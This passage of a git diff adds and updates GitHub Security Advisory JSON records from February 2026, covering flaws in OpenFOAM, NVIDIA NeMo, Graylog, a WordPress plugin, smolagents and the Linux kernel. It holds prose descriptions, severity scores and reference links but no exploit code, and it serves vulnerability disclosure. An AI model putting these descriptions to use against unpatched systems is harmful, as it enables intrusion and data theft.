a/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json b/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json new file mode 100644 index 0000000000000..19cf6653aedee --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f7cx-4c4g-9g59", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-61982" + ], + "details": "An arbitrary code execution vulnerability exists in the Code Stream directive functionality of OpenCFD OpenFOAM 2506. A specially crafted OpenFOAM simulation file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61982" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2292" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f86v-54pm-58q4/GHSA-f86v-54pm-58q4.json b/advisories/unreviewed/2026/02/GHSA-f86v-54pm-58q4/GHSA-f86v-54pm-58q4.json new file mode 100644 index 0000000000000..2606d106a8a7d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f86v-54pm-58q4/GHSA-f86v-54pm-58q4.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f86v-54pm-58q4", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33236" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where malicious data created by an attacker could cause code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33236" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33236" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json b/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json new file mode 100644 index 0000000000000..36804edf5a62e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ff7j-jwgr-hgxp", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1436" + ], + "details": "Improper Access Control (IDOR) in the Graylog API, version 2.2.3, which occurs when modifying the user ID in the URL. An authenticated user can access other user's profiles without proper authorization checks. Exploiting this vulnerability allows valid users of the system to be listed and sensitive third-party information to be accessed, such as names, email addresses, internal identifiers, and last activity. The endpoint 'http://:12900/users/' does not implement object-level authorization validations.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1436" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fjxh-qxr5-g7j4/GHSA-fjxh-qxr5-g7j4.json b/advisories/unreviewed/2026/02/GHSA-fjxh-qxr5-g7j4/GHSA-fjxh-qxr5-g7j4.json new file mode 100644 index 0000000000000..f45ebc2defe70 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fjxh-qxr5-g7j4/GHSA-fjxh-qxr5-g7j4.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fjxh-qxr5-g7j4", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-71228" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nLoongArch: Set correct protection_map[] for VM_NONE/VM_SHARED\n\nFor 32BIT platform _PAGE_PROTNONE is 0, so set a VMA to be VM_NONE or\nVM_SHARED will make pages non-present, then cause Oops with kernel page\nfault.\n\nFix it by set correct protection_map[] for VM_NONE/VM_SHARED, replacing\n_PAGE_PROTNONE with _PAGE_PRESENT.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71228" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/046303283d02c9732a778ccdeea433a899c78cbd" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/380d7c1af4bd3e797692f5410ab374a98e766cd4" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5fbdf95d2575ec53fd4a5c18e789b4d54a0281fe" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9531210f348aa78e260a9e5b0d1a6f7e7aa329e6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d5be446948b379f1d1a8e7bc6656d13f44c5c7b1" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fqmg-pv5x-v55p/GHSA-fqmg-pv5x-v55p.json b/advisories/unreviewed/2026/02/GHSA-fqmg-pv5x-v55p/GHSA-fqmg-pv5x-v55p.json new file mode 100644 index 0000000000000..8b8da0f7c4111 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fqmg-pv5x-v55p/GHSA-fqmg-pv5x-v55p.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fqmg-pv5x-v55p", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33252" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33252" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33252" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g5pw-hppv-79r6/GHSA-g5pw-hppv-79r6.json b/advisories/unreviewed/2026/02/GHSA-g5pw-hppv-79r6/GHSA-g5pw-hppv-79r6.json new file mode 100644 index 0000000000000..36922284a047a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g5pw-hppv-79r6/GHSA-g5pw-hppv-79r6.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g5pw-hppv-79r6", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23215" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/vmware: Fix hypercall clobbers\n\nFedora QA reported the following panic:\n\n BUG: unable to handle page fault for address: 0000000040003e54\n #PF: supervisor write access in kernel mode\n #PF: error_code(0x0002) - not-present page\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS edk2-20251119-3.fc43 11/19/2025\n RIP: 0010:vmware_hypercall4.constprop.0+0x52/0x90\n ..\n Call Trace:\n vmmouse_report_events+0x13e/0x1b0\n psmouse_handle_byte+0x15/0x60\n ps2_interrupt+0x8a/0xd0\n ...\n\nbecause the QEMU VMware mouse emulation is buggy, and clears the top 32\nbits of %rdi that the kernel kept a pointer in.\n\nThe QEMU vmmouse driver saves and restores the register state in a\n\"uint32_t data[6];\" and as a result restores the state with the high\nbits all cleared.\n\nRDI originally contained the value of a valid kernel stack address\n(0xff5eeb3240003e54). After the vmware hypercall it now contains\n0x40003e54, and we get a page fault as a result when it is dereferenced.\n\nThe proper fix would be in QEMU, but this works around the issue in the\nkernel to keep old setups working, when old kernels had not happened to\nkeep any state in %rdi over the hypercall.\n\nIn theory this same issue exists for all the hypercalls in the vmmouse\ndriver; in practice it has only been seen with vmware_hypercall3() and\nvmware_hypercall4(). For now, just mark RDI/RSI as clobbered for those\ntwo calls. This should have a minimal effect on code generation overall\nas it should be rare for the compiler to want to make RDI/RSI live\nacross hypercalls.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23215" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2687c848e57820651b9f69d30c4710f4219f7dbf" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2f467a92df61eb516a4ec36ee16234dd4e5ccf00" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/feb603a69f830acb58f78d604f0c29e63cd38f87" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gcr4-23wm-438x/GHSA-gcr4-23wm-438x.json b/advisories/unreviewed/2026/02/GHSA-gcr4-23wm-438x/GHSA-gcr4-23wm-438x.json new file mode 100644 index 0000000000000..fb67f20527cec --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gcr4-23wm-438x/GHSA-gcr4-23wm-438x.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gcr4-23wm-438x", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2026-2386" + ], + "details": "The The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Incorrect Authorization in all versions up to, and including, 6.4.7. This is due to the tpae_create_page() AJAX handler authorizing users only with current_user_can('edit_posts') while accepting a user-controlled 'post_type' value passed directly to wp_insert_post() without post-type-specific capability checks. This makes it possible for authenticated attackers, with Author-level access and above, to create arbitrary draft posts for restricted post types (e.g., 'page' and 'nxt_builder') via the 'post_type' parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2386" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3463156/the-plus-addons-for-elementor-page-builder" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4fc3e24a-8b51-4b6f-bacf-665ceb03bc05?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T13:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ghfm-hghj-9j75/GHSA-ghfm-hghj-9j75.json b/advisories/unreviewed/2026/02/GHSA-ghfm-hghj-9j75/GHSA-ghfm-hghj-9j75.json index 2f46e7efbfcc7..6afefb367e23a 100644 --- a/advisories/unreviewed/2026/02/GHSA-ghfm-hghj-9j75/GHSA-ghfm-hghj-9j75.json +++ b/advisories/unreviewed/2026/02/GHSA-ghfm-hghj-9j75/GHSA-ghfm-hghj-9j75.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-ghfm-hghj-9j75", - "modified": "2026-02-12T18:30:24Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-12T18:30:24Z", "aliases": [ "CVE-2025-69806" ], "details": "p2r3 bareiron commit: 8e4d4020d contains an Out-of-bounds Read, which allows unauthenticated remote attackers to get relative information leakage via a packet sent to the server", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-125" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T18:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-h85r-3jrw-9546/GHSA-h85r-3jrw-9546.json b/advisories/unreviewed/2026/02/GHSA-h85r-3jrw-9546/GHSA-h85r-3jrw-9546.json new file mode 100644 index 0000000000000..a8f98507e8d9f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h85r-3jrw-9546/GHSA-h85r-3jrw-9546.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h85r-3jrw-9546", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23213" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/pm: Disable MMIO access during SMU Mode 1 reset\n\nDuring Mode 1 reset, the ASIC undergoes a reset cycle and becomes\ntemporarily inaccessible via PCIe. Any attempt to access MMIO registers\nduring this window (e.g., from interrupt handlers or other driver threads)\ncan result in uncompleted PCIe transactions, leading to NMI panics or\nsystem hangs.\n\nTo prevent this, set the `no_hw_access` flag to true immediately after\ntriggering the reset. This signals other driver components to skip\nregister accesses while the device is offline.\n\nA memory barrier `smp_mb()` is added to ensure the flag update is\nglobally visible to all cores before the driver enters the sleep/wait\nstate.\n\n(cherry picked from commit 7edb503fe4b6d67f47d8bb0dfafb8e699bb0f8a4)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23213" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0de604d0357d0d22cbf03af1077d174b641707b6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c1853ebbec980d5c05d431bfd6ded73b1363fd00" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/cd7ff7fd3e4b77f0b5a292e0926532eaa07c5162" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hr8m-gc74-4f7w/GHSA-hr8m-gc74-4f7w.json b/advisories/unreviewed/2026/02/GHSA-hr8m-gc74-4f7w/GHSA-hr8m-gc74-4f7w.json index a8930d6998337..c464106558174 100644 --- a/advisories/unreviewed/2026/02/GHSA-hr8m-gc74-4f7w/GHSA-hr8m-gc74-4f7w.json +++ b/advisories/unreviewed/2026/02/GHSA-hr8m-gc74-4f7w/GHSA-hr8m-gc74-4f7w.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-284" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-hr98-gm7c-926r/GHSA-hr98-gm7c-926r.json b/advisories/unreviewed/2026/02/GHSA-hr98-gm7c-926r/GHSA-hr98-gm7c-926r.json new file mode 100644 index 0000000000000..2ed94c898f5de --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hr98-gm7c-926r/GHSA-hr98-gm7c-926r.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hr98-gm7c-926r", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-71225" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: suspend array while updating raid_disks via sysfs\n\nIn raid1_reshape(), freeze_array() is called before modifying the r1bio\nmemory pool (conf->r1bio_pool) and conf->raid_disks, and\nunfreeze_array() is called after the update is completed.\n\nHowever, freeze_array() only waits until nr_sync_pending and\n(nr_pending - nr_queued) of all buckets reaches zero. When an I/O error\noccurs, nr_queued is increased and the corresponding r1bio is queued to\neither retry_list or bio_end_io_list. As a result, freeze_array() may\nunblock before these r1bios are released.\n\nThis can lead to a situation where conf->raid_disks and the mempool have\nalready been updated while queued r1bios, allocated with the old\nraid_disks value, are later released. Consequently, free_r1bio() may\naccess memory out of bounds in put_all_bios() and release r1bios of the\nwrong size to the new mempool, potentially causing issues with the\nmempool as well.\n\nSince only normal I/O might increase nr_queued while an I/O error occurs,\nsuspending the array avoids this issue.\n\nNote: Updating raid_disks via ioctl SET_ARRAY_INFO already suspends\nthe array. Therefore, we suspend the array when updating raid_disks\nvia sysfs to avoid this issue too.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71225" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0107b18cd8ac17eb3e54786adc05a85cdbb6ef22" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/165d1359f945b72c5f90088f60d48ff46115269e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2cc583653bbe050bacd1cadcc9776d39bf449740" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json b/advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json new file mode 100644 index 0000000000000..7228d86753e3b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hvjw-vp7g-39h5", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-33253" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by convincing a user to load a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33253" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33253" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j9p7-7ww6-3mjx/GHSA-j9p7-7ww6-3mjx.json b/advisories/unreviewed/2026/02/GHSA-j9p7-7ww6-3mjx/GHSA-j9p7-7ww6-3mjx.json new file mode 100644 index 0000000000000..86315bba8ad57 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j9p7-7ww6-3mjx/GHSA-j9p7-7ww6-3mjx.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j9p7-7ww6-3mjx", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33249" + ], + "details": "NVIDIA NeMo Framework for all platforms contains a vulnerability in a voice-preprocessing script, where malicious input created by an attacker could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33249" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33249" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jfq5-qg8x-7rmp/GHSA-jfq5-qg8x-7rmp.json b/advisories/unreviewed/2026/02/GHSA-jfq5-qg8x-7rmp/GHSA-jfq5-qg8x-7rmp.json new file mode 100644 index 0000000000000..f6b45d7ec529b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jfq5-qg8x-7rmp/GHSA-jfq5-qg8x-7rmp.json @@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jfq5-qg8x-7rmp", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23216" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: target: iscsi: Fix use-after-free in iscsit_dec_conn_usage_count()\n\nIn iscsit_dec_conn_usage_count(), the function calls complete() while\nholding the conn->conn_usage_lock. As soon as complete() is invoked, the\nwaiter (such as iscsit_close_connection()) may wake up and proceed to free\nthe iscsit_conn structure.\n\nIf the waiter frees the memory before the current thread reaches\nspin_unlock_bh(), it results in a KASAN slab-use-after-free as the function\nattempts to release a lock within the already-freed connection structure.\n\nFix this by releasing the spinlock before calling complete().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23216" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/275016a551ba1a068a3bd6171b18611726b67110" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3835e49e146a4e6e7787b29465f1a23379b6ec44" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/48fe983e92de2c59d143fe38362ad17ba23ec7f3" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/73b487d44bf4f92942629d578381f89c326ff77f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8518f072fc92921418cd9ed4268dd4f3e9a8fd75" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9411a89e9e7135cc459178fa77a3f1d6191ae903" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ba684191437380a07b27666eb4e72748be1ea201" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jxgv-6j54-wwc7/GHSA-jxgv-6j54-wwc7.json b/advisories/unreviewed/2026/02/GHSA-jxgv-6j54-wwc7/GHSA-jxgv-6j54-wwc7.json new file mode 100644 index 0000000000000..d4eebd331c726 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jxgv-6j54-wwc7/GHSA-jxgv-6j54-wwc7.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jxgv-6j54-wwc7", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-2654" + ], + "details": "A weakness has been identified in huggingface smolagents 1.24.0. Impacted is the function requests.get/requests.post of the component LocalPythonExecutor. Executing a manipulation can lead to server-side request forgery. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2654" + }, + { + "type": "WEB", + "url": "https://github.com/CH0ico/CVE_choco_smolagent/blob/main/report.md#proof-of-concept-execution" + }, + { + "type": "WEB", + "url": "https://github.com/CH0ico/CVE_choco_smolagent/tree/main" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346451" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346451" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752774" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m8v3-m8mg-rrc7/GHSA-m8v3-m8mg-rrc7.json b/advisories/unreviewed/2026/02/GHSA-m8v3-m8mg-rrc7/GHSA-m8v3-m8mg-rrc7.json new file mode 100644 index 0000000000000..a480dfcae2b72 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m8v3-m8mg-rrc7/GHSA-m8v3-m8mg-rrc7.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m8v3-m8mg-rrc7", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23211" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm, swap: restore swap_space attr aviod kernel panic\n\ncommit 8b47299a411a (\"mm, swap: mark swap address space ro and add context\ndebug check\") made the swap address space read-only. It may lead to\nkernel panic if arch_prepare_to_swap returns a failure under heavy memory\npressure as follows,\n\nel1_abort+0x40/0x64\nel1h_64_sync_handler+0x48/0xcc\nel1h_64_sync+0x84/0x88\nerrseq_set+0x4c/0xb8 (P)\n__filemap_set_wb_err+0x20/0xd0\nshrink_folio_list+0xc20/0x11cc\nevict_folios+0x1520/0x1be4\ntry_to_shrink_lruvec+0x27c/0x3dc\nshrink_one+0x9c/0x228\nshrink_node+0xb3c/0xeac\ndo_try_to_free_pages+0x170/0x4f0\ntry_to_free_pages+0x334/0x534\n__alloc_pages_direct_reclaim+0x90/0x158\n__alloc_pages_slowpath+0x334/0x588\n__alloc_frozen_pages_noprof+0x224/0x2fc\n__folio_alloc_noprof+0x14/0x64\nvma_alloc_zeroed_movable_folio+0x34/0x44\ndo_pte_missing+0xad4/0x1040\nhandle_mm_fault+0x4a4/0x790\ndo_page_fault+0x288/0x5f8\ndo_translation_fault+0x38/0x54\ndo_mem_abort+0x54/0xa8\n\nRestore swap address space as not ro to avoid the panic.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23211" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a0f3c0845a4ff68d403c568266d17e9cc553e561" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b0020cbd26380177b9fb8b7e75a8f7bdba79db20" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mx8g-qc6m-wcmf/GHSA-mx8g-qc6m-wcmf.json b/advisories/unreviewed/2026/02/GHSA-mx8g-qc6m-wcmf/GHSA-mx8g-qc6m-wcmf.json new file mode 100644 index 0000000000000..f20f485158a3d --- /dev/null +++ 